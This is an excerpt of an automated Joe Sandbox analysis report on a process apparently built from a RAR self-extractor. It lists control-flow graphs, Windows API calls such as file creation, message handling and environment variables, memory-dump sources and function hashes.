                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 993 c698e0-c69901 call c7ec50 996 c69903-c69906 993->996 997 c6990c 993->997 996->997 998 c69908-c6990a 996->998 999 c6990e-c6991f 997->999 998->999 1000 c69927-c69931 999->1000 1001 c69921 999->1001 1002 c69936-c69943 call c66edb 1000->1002 1003 c69933 1000->1003 1001->1000 1006 c69945 1002->1006 1007 c6994b-c6996a CreateFileW 1002->1007 1003->1002 1006->1007 1008 c6996c-c6998e GetLastError call c6bb03 1007->1008 1009 c699bb-c699bf 1007->1009 1013 c699c8-c699cd 1008->1013 1015 c69990-c699b3 CreateFileW GetLastError 1008->1015 1011 c699c3-c699c6 1009->1011 1011->1013 1014 c699d9-c699de 1011->1014 1013->1014 1016 c699cf 1013->1016 1017 c699e0-c699e3 1014->1017 1018 c699ff-c69a10 1014->1018 1015->1011 1021 c699b5-c699b9 1015->1021 1016->1014 1017->1018 1022 c699e5-c699f9 SetFileTime 1017->1022 1019 c69a12-c69a2a call c70602 1018->1019 1020 c69a2e-c69a39 1018->1020 1019->1020 1021->1011 1022->1018
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C67760,?,00000005,?,00000011), ref: 00C6995F
                                                                                              • GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00C67760,?,00000005,?), ref: 00C699A2
                                                                                              • GetLastError.KERNEL32(?,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00C67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C699F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
                                                                                              • Instruction ID: 4f4f15176c9dbd542c455e2c566007e1663764cf8670cd3384a758c78fe9c1d6
                                                                                              • Opcode Fuzzy Hash: 7cf724e99e24df205007f9324f985c91899f6fed81f623d808cf7beecac5520a
                                                                                              • Instruction Fuzzy Hash: CA311530544785AFE7309B24CC85B9ABBD8FB04320F200B1DF9B9961D1D3B59A54CB95

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1052 c7b568-c7b581 PeekMessageW 1053 c7b583-c7b597 GetMessageW 1052->1053 1054 c7b5bc-c7b5be 1052->1054 1055 c7b599-c7b5a6 IsDialogMessageW 1053->1055 1056 c7b5a8-c7b5b6 TranslateMessage DispatchMessageW 1053->1056 1055->1054 1055->1056 1056->1054
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                              • IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                              • TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
                                                                                              • Instruction ID: 801ccef3ff7073cd9888f00a71f045cc942c0f86fcec78edc4a46d4c76b0958e
                                                                                              • Opcode Fuzzy Hash: ea49f1b3b8e706ed9052a56c246f9f8f3e7d6e3de9ac54d01770a1100e93a905
                                                                                              • Instruction Fuzzy Hash: 96F07072A0115AAB8B20ABE6EC4CFDF7FBCEE057957408455F519D2050EB74DA05CBB0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1057 c7abab-c7abca GetClassNameW 1058 c7abf2-c7abf4 1057->1058 1059 c7abcc-c7abe1 call c71fbb 1057->1059 1060 c7abf6-c7abf9 SHAutoComplete 1058->1060 1061 c7abff-c7ac01 1058->1061 1064 c7abe3-c7abef FindWindowExW 1059->1064 1065 c7abf1 1059->1065 1060->1061 1064->1065 1065->1058
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00C7ABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00C7ABF9
                                                                                                • Part of subcall function 00C71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00C6C116,00000000,.exe,?,?,00000800,?,?,?,00C78E3C), ref: 00C71FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00C7ABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
                                                                                              • Instruction ID: 18670bbea07f5c1b60e0b74907f07587b9cdeb5a2cca97305d3cf09db4433e4c
                                                                                              • Opcode Fuzzy Hash: c35e4762cacc2a1d5ed75642b6aa6e487fe15442b9a4d2e160e3971b44fd2fc3
                                                                                              • Instruction Fuzzy Hash: 31F0823360022877DB205764AC09F9F766C9B86B40F488011FA49A21C0D760EB4185B6

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • OleInitialize.OLE32(00000000), ref: 00C7AC2F
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
                                                                                              • SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 3498096277-3360196438
                                                                                              • Opcode ID: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
                                                                                              • Instruction ID: 50bd7bcf900f84a944f2fae18a5350967be3ca0895d401093704b0ba33ebdbb0
                                                                                              • Opcode Fuzzy Hash: 2f48919e5b16783bf913a964ad09a105c6af7b1c8cf10d9c3ac63cfc8445b7b3
                                                                                              • Instruction Fuzzy Hash: 22F0F9B5900249ABCB10AFA9D849EEFFFFCEF85704F00816AE415A2241DBB456058BA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1070 c7dbde-c7dc09 call c7ec50 SetEnvironmentVariableW call c70371 1074 c7dc0e-c7dc12 1070->1074 1075 c7dc36-c7dc38 1074->1075 1076 c7dc14-c7dc18 1074->1076 1077 c7dc21-c7dc28 call c7048d 1076->1077 1080 c7dc1a-c7dc20 1077->1080 1081 c7dc2a-c7dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C7DBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
                                                                                              • Instruction ID: 396281f0145c348e39d9fa48edb16dfb19983bf8cec64ce8b388a2a97b5e6ce8
                                                                                              • Opcode Fuzzy Hash: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
                                                                                              • Instruction Fuzzy Hash: 2DF0ECB2504224A7DF221F958C0ABFE3B68BF04785F044451BD8E95165E7B08940D7B0

                                                                                              Control-flow Graph

                                                                                              • Nodes (ID: address range, call):
                                                                                                • 1082: c69785-c69791
                                                                                                • 1083: c69793-c6979b, GetStdHandle
                                                                                                • 1084: c6979e-c697b5, ReadFile
                                                                                                • 1085: c697b7-c697c0, call c698bc
                                                                                                • 1086: c69811
                                                                                                • 1088: c69814-c69817
                                                                                                • 1090: c697c2-c697ca
                                                                                                • 1091: c697d9-c697dd
                                                                                                • 1092: c697cc
                                                                                                • 1093: c697ee-c697f2
                                                                                                • 1094: c697df-c697e8, GetLastError
                                                                                                • 1095: c697cd-c697d7, call c69785
                                                                                                • 1096: c697ea-c697ec
                                                                                                • 1097: c697f4-c697fc
                                                                                                • 1098: c6980c-c6980f
                                                                                                • 1099: c697fe-c69807, GetLastError
                                                                                                • 1101: c69809-c6980a
                                                                                              • Edges: 1082->1083, 1082->1084, 1083->1084, 1084->1085, 1084->1086, 1085->1090, 1085->1091, 1086->1088, 1090->1091, 1090->1092, 1091->1093, 1091->1094, 1092->1095, 1093->1097, 1093->1098, 1094->1093, 1094->1096, 1095->1088, 1096->1088, 1097->1098, 1097->1099, 1098->1088, 1099->1098, 1099->1101, 1101->1095
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00C69795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00C697AD
                                                                                              • GetLastError.KERNEL32 ref: 00C697DF
                                                                                              • GetLastError.KERNEL32 ref: 00C697FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
                                                                                              • Instruction ID: 51cbad0186693299d2b98ddd9fc79535ad69eba3da2d5f66dce27e0afe8642ad
                                                                                              • Opcode Fuzzy Hash: 0111757426e18a2f01c6913941c3491c16f5dd0dac629c709f145db6f7ca89d3
                                                                                              • Instruction Fuzzy Hash: 68117C30910204EBDF305F65C888A6D37BDFB5A364F10892AE426861D0D7749F44DB61
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C6D710,00000000,00000000,?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue), ref: 00C8AD66
                                                                                              • GetLastError.KERNEL32(?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000,00000364,?,00C898B7), ref: 00C8AD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C8ACDB,00C6D710,00000000,00000000,00000000,?,00C8AED8,00000006,FlsSetValue,00C97970,FlsSetValue,00000000), ref: 00C8AD80
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
                                                                                              • Instruction ID: f617b501f0424fabf083a6d80275a7b5164b69a4caa4d3e2273a3463a5c52ad8
                                                                                              • Opcode Fuzzy Hash: a4a9b740d20f130c0e52e1d4d13734c367219481df12666831f8188df41488d6
                                                                                              • Instruction Fuzzy Hash: 2E014736201632ABD7215B69DC48B5B7B98EF00BA67100623FD16D3550C720ED01C7E9
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00C6D343,00000001,?,?,?,00000000,00C7551D,?,?,?), ref: 00C69F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00C7551D,?,?,?,?,?,00C74FC7,?), ref: 00C69FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00C6D343,00000001,?,?), ref: 00C6A011
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
                                                                                              • Instruction ID: 9109b812ca69da02acd576cb4ede95a99b3597f5021fec42eee57c1e6940299c
                                                                                              • Opcode Fuzzy Hash: 59917e9831b7e8e0c5a7077a875f7126a9cc16acf6f29b6ae9f0ef4ec09f89f0
                                                                                              • Instruction Fuzzy Hash: 4731D331208345AFDB24CF20D898B6EB7A9FF85715F04051DF952A7290C775AE48CBA3
                                                                                              APIs
                                                                                                • Part of subcall function 00C6C27E: _wcslen.LIBCMT ref: 00C6C284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A329
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: 58f55e36c98172f6a91adad589154d2edd2febdbef3c563e86f15896b2151929
                                                                                              • Instruction ID: b637bfd43db3ebbbc84b9bd47217bbe4d4f37ca7eca2bfd1e2a0b7059f1a1cbe
                                                                                              • Opcode Fuzzy Hash: 58f55e36c98172f6a91adad589154d2edd2febdbef3c563e86f15896b2151929
                                                                                              • Instruction Fuzzy Hash: 8901D8351002106AEF31AB754CC9BFD3748AF09780F044425F912F61A1D754CB81DEB6
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C8B8B8
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 692278f03b3a5f5c770e00ceed4c2a19239e5e5d03f9190d011add41bb14376c
                                                                                              • Instruction ID: f5411a5fdffebf6c9a28d8502701656c294bdbda3a2bc05107496781c355131c
                                                                                              • Opcode Fuzzy Hash: 692278f03b3a5f5c770e00ceed4c2a19239e5e5d03f9190d011add41bb14376c
                                                                                              • Instruction Fuzzy Hash: 5341277050428C9FDB219E25CC84BFABBBDEB05308F1404EDE59A86142D335AE46DF64
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00C8AFDD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 486d26a8cc9c4279f2efc40bf147783683ce7256f706fcc77bdb5945c3cdc253
                                                                                              • Instruction ID: 8573cfff80631208f92d23246f5891d3fdedd407176fdab95b4feb13cad6e23d
                                                                                              • Opcode Fuzzy Hash: 486d26a8cc9c4279f2efc40bf147783683ce7256f706fcc77bdb5945c3cdc253
                                                                                              • Instruction Fuzzy Hash: 70014832505219BBCF02AF90DC0AEEE7F62EF08754F054256FE1866160CB328A31EB85
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C8A56F), ref: 00C8AF55
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 27973ccab17cbe18b012570587d795f3cac7dfff8261effa8bc8345c7c82b9b9
                                                                                              • Instruction ID: ad03bcef8894e35a25e77fe98af45874b05af96d7d5d58f62751d12dc36c7386
                                                                                              • Opcode Fuzzy Hash: 27973ccab17cbe18b012570587d795f3cac7dfff8261effa8bc8345c7c82b9b9
                                                                                              • Instruction Fuzzy Hash: 57F0E931646218BFCF05BF51CC0AE9E7F61EF04B11B414166FD0996260DB715E10A78E
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 3ccb84a77b8d391f92c9daf48797485be15b2fd43820bdc19c0c2f9de91cf775
                                                                                              • Instruction ID: 750cb7ece84621fcc0858e4663d6c3be8ff50558d02fadde9adcd6239779e33b
                                                                                              • Opcode Fuzzy Hash: 3ccb84a77b8d391f92c9daf48797485be15b2fd43820bdc19c0c2f9de91cf775
                                                                                              • Instruction Fuzzy Hash: BEE0E5316462287BDA01AB65DC0AF6EBB54DB14B21B0202ABF805A7250DE715E1197DE
                                                                                              APIs
                                                                                                • Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C8BA89,?,00000000), ref: 00C8BC64
                                                                                              • GetCPInfo.KERNEL32(00000000,00C8BA89,?,?,?,00C8BA89,?,00000000), ref: 00C8BC77
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: a50be414f55ce0b7260a6729fbaaf753e107bca3e14ea8c3c45a4c6108c5e780
                                                                                              • Instruction ID: 7a89bbb720d0a261fcaab3c4759d1c63033222cf8439c98becb0f8bccd376cd2
                                                                                              • Opcode Fuzzy Hash: a50be414f55ce0b7260a6729fbaaf753e107bca3e14ea8c3c45a4c6108c5e780
                                                                                              • Instruction Fuzzy Hash: 52515770900245AFDB20EF75C8816BBBBE4EF41308F18446FD4A68B252D7359E46DB98
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00C69A50,?,?,00000000,?,?,00C68CBC,?), ref: 00C69BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00C68411,-00009570,00000000,000007F3), ref: 00C69BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
                                                                                              • Instruction ID: 6fbdeb981a36cc5d2b171ab99e0940a20a592d1398e0b2fbeff77a0bb9611b7e
                                                                                              • Opcode Fuzzy Hash: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
                                                                                              • Instruction Fuzzy Hash: 8841CE316043418FDB34DF15E5C456AB7EDFFD9720F148A2EE8A183261D770EE458A51
                                                                                              APIs
                                                                                                • Part of subcall function 00C897E5: GetLastError.KERNEL32(?,00CA1030,00C84674,00CA1030,?,?,00C83F73,00000050,?,00CA1030,00000200), ref: 00C897E9
                                                                                                • Part of subcall function 00C897E5: _free.LIBCMT ref: 00C8981C
                                                                                                • Part of subcall function 00C897E5: SetLastError.KERNEL32(00000000,?,00CA1030,00000200), ref: 00C8985D
                                                                                                • Part of subcall function 00C897E5: _abort.LIBCMT ref: 00C89863
                                                                                                • Part of subcall function 00C8BB4E: _abort.LIBCMT ref: 00C8BB80
                                                                                                • Part of subcall function 00C8BB4E: _free.LIBCMT ref: 00C8BBB4
                                                                                                • Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6
                                                                                              • _free.LIBCMT ref: 00C8BA9F
                                                                                              • _free.LIBCMT ref: 00C8BAD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 1d5d24f8910496ccb5ddba80678274894429ed55ba708d4dc70af8f9003c327a
                                                                                              • Instruction ID: b2bcf197d4394e05e68dd507e38307d86bf622e3e3725640ca7fb1b3f029be87
                                                                                              • Opcode Fuzzy Hash: 1d5d24f8910496ccb5ddba80678274894429ed55ba708d4dc70af8f9003c327a
                                                                                              • Instruction Fuzzy Hash: 37310E31904209AFDB14FFA9D445BEDB7F5EF40328F25409AE4245B2A1EB325E44FB58
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C61E55
                                                                                                • Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF
                                                                                              • _wcslen.LIBCMT ref: 00C61EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 9913a03494d8ba6841292968f3b3f59b5f273dc9be0dbc2172c08dfe7e567ec7
                                                                                              • Instruction ID: 9e84d095515dcaeeb399543c795c8733845c451871d2a90b3480cdca8b69b4e5
                                                                                              • Opcode Fuzzy Hash: 9913a03494d8ba6841292968f3b3f59b5f273dc9be0dbc2172c08dfe7e567ec7
                                                                                              • Instruction Fuzzy Hash: 9E314B71904249AFCF21DF99C985AEEBBF5AF48300F184069F845A7251CB329E01DB64
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
                                                                                              • Instruction ID: c480f7fd1858ef7a9041a9729bc8695fe0b2377c3792290fb22a3b0788cc493e
                                                                                              • Opcode Fuzzy Hash: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
                                                                                              • Instruction Fuzzy Hash: 1D21F2312482459BC724CF35C4D1AABBBE8EF51704F08481DF4E583151D339DA0D9B61
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C69F27,?,?,00C6771A), ref: 00C696E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C69F27,?,?,00C6771A), ref: 00C69716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
